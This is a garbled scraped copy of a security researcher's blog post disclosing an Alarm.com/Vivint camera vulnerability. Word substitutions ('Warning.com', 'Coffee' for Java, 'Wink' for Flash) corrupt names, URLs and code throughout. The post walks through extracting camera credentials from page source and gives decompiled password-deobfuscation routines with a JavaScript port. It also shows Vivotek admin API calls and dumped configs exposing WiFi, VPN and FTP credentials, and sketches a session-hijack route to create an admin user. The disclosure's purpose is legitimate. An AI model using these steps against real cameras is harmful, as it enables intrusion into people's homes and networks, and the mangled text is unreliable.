What Does Uploading Firmware Mean on the Camera for Vivint
Home › blog
Alarm.com Camera Vulnerability
Alarm.com uses a Java spider web player to live-stream video from your home security cameras to your browser, the Coffee actor source code is hands decompiled and can grant an assailant access to the camera and home network.
I've been a user of Vivint for about 4 years. 3 Years ago I discovered a small vulnerability in their camera system and reported information technology to both Alarm.com and Vivint. The result even so lives on to engagement, this post volition demonstrate how to gain admission to your photographic camera's Web UI and in turn betrayal some security holes over your home network.
Warning.com acts as mediator between hardware manufacturers and dealers (such equally Vivnt, Frontpoint Security and many others)
TL;DR
Warning.com uses a Java web player to live-stream video from your home security cameras to your browser, the Coffee player source code is easily decompiled and can grant an attacker access to the following:
- Warning.com's master encryption key
- Your camera's encrypted password
- The algorithm to decrypt the password (using the master primal)
- Your external IP & photographic camera ports (photographic camera automatically enables
UPnPport forwarding) - Photographic camera MAC accost
Which, in plow, will gain the attacker the post-obit through the Camera's own security flaws:
- Full admission & control to your camera
- Your dwelling network information
- IEEE 802.1x information (including CA certificate)
- WiFi information (including network keys)
This means:
- Attacker can access your WiFi network
- Attacker can fully view all camera streams
- Attacker tin fully command the camera settings
- automatically record and upload videos to their ain FTP servers
- modify all settings, and lock you out.
- update photographic camera firmware! (extremely dangerous)
- Attacker has access to Vivnt FTP servers
- Assailant has access to Vivnt VPN servers
and more than …
Caveats
As with all such vulnerabilities, this doesn't necessarily mean you're being watched by an hacker right at present! It does however create reasonable risk of an attack vector which is not as well complicated, nor also farfetched:
- The attacker needs to gain access to your browser or your
warning.combrowser session- Easily done through a malicious browser extension, or spyware on your reckoner to hijack your session
- Are you using an easy-to-approximate password for your Alarm.com/Vivint business relationship?
- Is your e-mail account secured? ("forgot password" feature is the easiest assault vector if your email is insecure)
- The attacker needs to gain access to your WiFi or local network
- Consumer WiFi networks routers are notoriously piece of cake to hack
- How many firm guests did you lot give your WiFi password to? Are their devices safe from leaking that countersign?
You don't have to exist paranoid to worry about security, it is a reality of the mod age!
Official Response
Upon initial contact, neither company's representatives were interested in discussing further, and only told me they'd log my report and let the tech team know, so I took to Twitter, and posted in /r/homedefense on reddit, which caught Vivint's attending.
They immediately contacted me and put me in touch with Vivint's VP of Innovation, nosotros had a productive chat and he explained that Vivint's focus was to move into the Vivint Sky system and away from the Alarm.com system. Fast forrard 3 years later, while Vivint has indeed stopped selling the old system to new customers, they are still operating the Warning.com organisation for one-time customers. Myself included.
Some noteworthy events over the past iii years that relate to this issue:
- On September 2015, Google announced they were dropping back up for Coffee with Chrome v45
- upon this announcement Warning.com worked to update their video player to a Wink histrion instead of the Java one
- currently the Coffee player is still accessible allowing for the vulnerability described here
- the Flash system is non perfect, and I take found some issues with it too (see beneath)
- as of December 2016, Chrome v55 now blocks Flash by default
- At that place is no info notwithstanding from Alarm.com on what they will supplant the video role player with
- Vivint started shipping cameras with a firmware that strips out the Web UI completely, and executes a daily remote reset for camera settings and keys.
- Though those volition do nothing to protect you from the Alarm.com vulnerability, or the camera's ain weak security once accessed.
- There has been MANY Vulnerabilities exposed in Vivotek cameras including:
- execute capricious code,
- admission the video stream via RTSP
- dump the camera'due south retentiveness and think user credentials
The Details
Here is are the steps to follow which will give y'all access to the camera system:
ane. Login to your Warning.com web portal
two. Get to Live Video page https://world wide web.alert.com/web/Video/LiveView.aspx
- You might get redirected to
https://www.warning.com/web/Video/LiveViewFlash.aspx. - This is a soft redirect to the new Flash player if Alarm.com detects your browser supports it.
- stay on the
LiveView.aspxfolio if you can, or just manually view source in step 3.
3. View the page source: view-source:https://www.warning.com/web/Video/LiveView.aspx
4. You will find the following <applet> code, repeated for as many cameras you lot have on the system:
<applet type = "application/x-coffee-applet" class = "live_viewer_object" CODE = "VideoViewer.class" ARCHIVE = "LiveViewer082.jar" NAME = "LiveViewer_ctl00_phBody_ctl08" ID = "LiveViewer_ctl00_phBody_ctl08" WIDTH = "1280" Tiptop = "800" MAYSCRIPT = "true" scriptable = "true" pluginspage = "http://java.lord's day.com/products/plugin/index.html#download" > <param name= "permissions" value= "all-permissions" /> <param name = addr value = [redacted]/ > <param name = alt_addr value = [redacted]/ > <param name = query value = /nphMotionJpeg?Resolution=1280x800&Quality=5 > <param proper name = login value = root > <param name = pwd value = [redacted] > <param name = mac value = [redacted] > <param name = resolution value = 1280x800 > <param name = make value = Alarm.com > <param name = model value = ADC-V620PT > <param name = prefer_alt_ip value = truthful > <param name = pantilt value = true > <param name = vmd_mode value = faux > <param proper name = protected_mode value = false > <param name = vpnproxyserver value = https://www.warning.com/spider web/ > <param name = usevpn value = faux > <param name = SessionId value = [redacted] > <param name = border value = false > <param name = language value = 1 > <param name = applet_id value = LiveViewer_ctl00_phBody_ctl08 > <param proper name = channel value = 0 > <param name = in_privacy_mode value = false > <param proper name = deviceId value = 2049 > </APPLET> 5. For each camera listed, copy the values for the following params: (addr, alt_addr, login, pwd, mac) here's what they hateful:
| Param | Description |
|---|---|
addr | Public IP and port |
alt_addr | Local IP and port |
login | Login/username, always root |
pwd | Encrypted password |
mac | MAC address |
Decrypting the Password
The video actor and the decryption logic are included in LiveViewer082.jar (which you tin can download without fifty-fifty having to be logged in)
The .jar file can easily be decompiled into human-readable code using JD GUI.
one time decompiled, and upon some inspection of the source code, I found the following method nether ConnectionThread.grade:
private String Deobfuscate ( String Pwd ) { String primal = "[redacted]" ; String unXorBuf = "" ; String unHexBuf = "" ; try { for ( int Ind = 0 ; Ind < Pwd . length (); Ind ++) { unXorBuf = unXorBuf + Integer . toHexString ( Integer . parseInt ( Pwd . substring ( Ind , Ind + 1 ), 16 ) ^ Integer . parseInt ( central . substring ( Ind , Ind + 1 ), sixteen )); } for ( int Ind = 0 ; Ind < unXorBuf . length (); Ind += 2 ) { unHexBuf = unHexBuf + ( char ) Integer . parseInt ( unXorBuf . substring ( Ind , Ind + 2 ), 16 ); } return unHexBuf ; } catch ( Exception ex ) { DbgMsg ( "(e4) " + ex . getMessage ()); } return Pwd ; }
Note:
- The
keyvalue hither is the global Alarm.com Master Key, I have redacted the value so you tin can go it yourself if y'all follow the instructions in this post.- I am non fully certain this volition be the same value for all Alarm.com users, but so far I take verified with some other friend who is also a Vivint user and it is indeed the aforementioned.
This will allow you to "decrypt" the pwd field from earlier:
<param name = pwd value = [redacted] > For expediency, here's a JavaScript version of this function that you lot tin can run in your browser right now:
const key = ' [redacted] ' office deobfuscate ( Pwd ) { let unXorBuf = '' let unHexBuf = '' for ( let Ind = 0 ; Ind < Pwd . length ; Ind ++ ) { unXorBuf = unXorBuf + Number ( parseInt ( Pwd . substring ( Ind , Ind + 1 ), 16 ) ^ parseInt ( key . substring ( Ind , Ind + 1 ), sixteen )). toString () } for ( allow Ind = 0 ; Ind < unXorBuf . length ; Ind += 2 ) { unHexBuf = unHexBuf + Cord . fromCharCode ( parseInt ( unXorBuf . substring ( Ind , Ind + 2 ), 16 )) } return unHexBuf } With the username root and countersign decrypted, you can now access your camera's web interface and configuration using the IP address and port information obtained earlier:
The web interface and API are protected with Assimilate HTTP Authentication Vivint started shipping cameras with the web UI stripped out, still this does zero to remove the admin API, which is documented in detail on your camera'due south manual, Here'southward an example from the Vivotek PT8133:
Vivotek Admin API Accessing your Photographic camera
My cameras, and (from what I can tell) all the Alarm.com / Vivint cameras are manifactured by Vivotek
- You tin can read the Vivotek admin API values using:
Go http://[user]:[pwd]@[ip]:[port]/cgi-bin/admin/getparam.cgi - You can write Vivotek admin API values using:
POST http://[user]:[pwd]@[ip]:[port]/cgi-bin/admin/setparam.cgi?[key]=[value] - Consult your camera manual for variations and cardinal/value mappings
- iSpy did an astonishing chore of indexing all the video streaming urls beyond all Viovotek cameras by model
Whether you accept access to the web UI, or you become by the HTTP API, you now have access to view the entire arrangement'due south parameters stored on the camera, this is where the vulnerability finally takes shape, these parameters include everything from your photographic camera'south settings, to the WiFi network keys and more than!
Here are a few highlights that I found to be most interesting (with values redacted):
Your Camera'due south Users & Settings
All the camera's configurations are laid bare, and are easily adaptable with a unproblematic Postal service asking. This includes all the Video Streams, Move Detection, Recording Schedules, FTP upload targets, even Firmware Updates, which allows an assaulter to completely replace your camera's firmware, leaving both you and Warning.com none the wiser!
system_hostname='Wireless Mega-Pixel Network Camera' system_ntp='ntp.alert.com' system_dailyreboot='07:00' system_info_modelname='PT8133W' system_info_extendedmodelname='ADC-V620PT' system_info_serialnumber='[redacted]' system_info_firmwareversion='PT8133-ALAM-0102c1' security_user_i0_name='root' security_user_i0_pass='[redacted]' security_user_i0_privilege='admin' network_http_alternateport='40926' network_http_authmode='digest' An interesting and as well scary discovery:
Your camera exposes a alive audio stream, one which Alarm.com & Vivint do not offer y'all access to, just an assaulter can listen to everything going on in your domicile!
network_rtsp_s0_audiotrack = '-1' network_rtsp_s0_multicast_alwaysmulticast = '0' network_rtsp_s0_multicast_videoport = '5560' network_rtsp_s0_multicast_audioport = '5562' network_rtsp_s0_multicast_ipaddress = '[redacted]' network_rtsp_s0_multicast_ttl = '15' Your Domicile Network
Your WiFi keys are stored in plain text (redacted below)!
network_ieee8021x_enable = '0' network_ieee8021x_eapmethod = 'eap-peap' network_ieee8021x_identity_peap = '' network_ieee8021x_identity_tls = '' network_ieee8021x_password = '' network_ieee8021x_privatekeypassword = '' network_ieee8021x_ca_exist = '0' network_ieee8021x_ca_time = '0' network_ieee8021x_ca_size = '0' network_ieee8021x_certificate_exist = '0' network_ieee8021x_certificate_time = '0' network_ieee8021x_certificate_size = '0' network_ieee8021x_privatekey_exist = '0' network_ieee8021x_privatekey_time = '0' network_ieee8021x_privatekey_size = '0' wireless_ssid = '[redacted]' wireless_wlmode = 'Infra' wireless_channel = 'half-dozen' wireless_txrate = '0' wireless_encrypt = '3' wireless_authmode = 'OPEN' wireless_keylength = '64' wireless_keyformat = 'HEX' wireless_keyselect = 'one' wireless_key1 = '[redacted]' wireless_key2 = '[redacted]' wireless_key3 = '[redacted]' wireless_key4 = '[redacted]' wireless_domain = '0' wireless_algorithm = 'AES' wireless_presharedkey = '[redacted]' wireless_connecttype = 'transmission' Alarm.com VPN
Dump the certificates and connect to their VPN!
vpn_protocol = 'udp' vpn_host = 'videovpn.alarm.com' vpn_port = '1294' vpn_devtype = 'tun' vpn_encryption = 'AES-256-CBC' Alarm.com DDNS Login
I'm sure with enough research some DDNS server vulnerabilities can be discovered here, oh and look they gave us credentials! In plain text!
ddns_Alarm_hostname = 'www.alarm.com' ddns_Alarm_usernameemail = '' ddns_Alarm_passwordkey = '[redacted]' ddns_Alarm_servername = 'deviceapi.alarm.com' ddns_Alarm_updateinterval = '3600' Alert.com FTP upload servers
Another potential for researching FTP vulnerabilities, they were kind plenty to provide credentials here as well. In plain text!
server_i0_name = 'alarm_ftp' server_i0_type = 'ftp' server_i0_http_url = 'http://' server_i0_http_username = '' server_i0_http_passwd = '' server_i0_ftp_address = '[redacted]' server_i0_ftp_username = '[redacted]' server_i0_ftp_passwd = '[redacted]' server_i0_ftp_port = '21' Bonus: Flash Histrion Vulnerability
Since Alarm.com switched to a Flash Histrion (though keeping the Coffee Role player accessible) they employed a more circuitous encryption mechanism, 1 that I enjoyed bang-up too!
Here'southward the breakdown:
The Flash version of the player is served from: https://www.alert.com/web/Video/LiveViewFlash.aspx
-
The page will load the Flash objects, and go on to brand a call to go some encrypted content from:
https://www.alarm.com/web/Video/LiveViewFlash.aspx/GetProxyMjpegStreamUrlwith a JSON asking payload:{ 'camId': 'xxxx' } Note: upwards to this point everything is secured backside HTTPSand the user Web Session (in cookies) -
The response is a JSON object with an encrypted content:
{"d": "[encrypted]"}
So what's backside this mysterious request? lets find out!
1. Just as before, lets grab the video player source code from: https://world wide web.alert.com/web/Video/AdcSharedUserControls/Video/LocomoteLiveViewer/LocoLivePlayerFlex.swf
2. This fourth dimension we'll use JPEXS Free Flash Decompiler
3. Upon inspecting the source, I establish the decryption logic under scripts/com/axis/http/url.as
public static function parse_enc ( param1 : Cord ) : Object { Logger . log ( "url enc =" + param1 , LogEventLevel . DEBUG ) ; var _loc2_ : CBCMode = new CBCMode ( new AESKey ( Hex . toArray ( "[redacted]" )), new PKCS5 ()) ; _loc2_ . IV = Hex . toArray ( "[redacted]" ) ; var _loc3_ : ByteArray = new ByteArray () ; _loc3_ . writeBytes ( Base64 . decode ( param1 )) ; _loc2_ . decrypt ( _loc3_ ) ; Logger . log ( "url dec =" + _loc3_ . toString (), LogEventLevel . DEBUG ) ; render parse ( _loc3_ . toString ()) ; } Fundamental & Iv values [redacted].
The encryption method hither is more than sophisticated than the Coffee method; it is using AES-128-CBC Cipher Block Chaining (CBC) encryption with the AS3 Crypto Framework. The encrypted JSON response from earlier: {"d": "[encrypted]"} is actually a base64 encoded binary, which given the Encryption Key (primal) and Initialization Vector (Four) exposed to a higher place, y'all tin decipher hands.
However, this encryption ultimately pointless! Upon decrypting the values, I establish it merly exposes the video relay server with a token:
https://relayvideo.alert.com/ProxyLiveVideoWeb.ashx?token=[redacted] This is pointless because I can see that in my browser'due south web inspector already:
Web Inspector I'm non sure what their motivation was to encrypt the total URL here with the token, but since both API calls are protected backside HTTPS and web sessions this really does zippo to enhance security.
Wink Relay Server Attack Vector:
In spite of the complex and ultimately pointless encryption, The Flash player method that Alarm.com at present uses is much more secure than the prior Coffee method, though, with the Java player still accessible, the vulnerability remains.
The Flash relay server nevertheless exposes a possible set on vector, one that'due south "simpler" to pull off than the Java Player method described above.
Mainly relying on Session Hijacking, (which is too a requirement of pulling off the Java set on vector described above) an attacker can merely utilise the Alarm.com proxies to directly access and control the camera:
// Video Proxy https://relayvideo.alert.com/ProxyLiveVideoWeb.ashx // Command Proxy https://world wide web.alarm.com/web/Video/ProxyCamControl.ashx an attacker tin can admission the camera stream, and so long as they can false your session, and they can send a command to the camera using the control proxy, create a new user with admin privileges and skip all the rest of having to decompile Jar files and decrypt passwords!
Though this is untested as I've already uncovered enough headaches for one twenty-four hours, lets promise the control proxy actually filters commands before passing them on to the camera!
I described this as "unproblematic" as in needing fewer steps. However, session hijacking is not an easy task to pull and requires more than social applied science skills over technical skills to fool the victim into installing / loading the tools a hacker needs to gain access.
Don't Panic
How to stay safe:
- Secure your email account with Multi-factor Authentication
- All the security precautions volition do you lot no good if somebody gains access to your email and employs a "forgot password" attack
- Research and thoroughly secure your dwelling house router
- Block all external access
- Apply strong WiFi security
- Disable UPnP
- Research and Thoroughly secure your IP Cameras
- Setup Google Alerts for your Camera's model
- Need your security provider (Warning.com or whatever other) to update their Camera's firmware if you don't have access
- Don't use IP Cameras
- This should be obvious, if you actually desire to be safe, don't expose yourself!
- Don't apply Alert.com or any of its vendors
- Another obvious ane!
- If after 3 years they all the same have not fixed this consequence, I have zero hope they ever will, and so this blog post is my final endeavour to gain their attention for the benefit of all their customers!
Source: https://ahmadnassri.com/blog/alarm-com-camera-vulnerability-exposed/
0 Response to "What Does Uploading Firmware Mean on the Camera for Vivint"
Post a Comment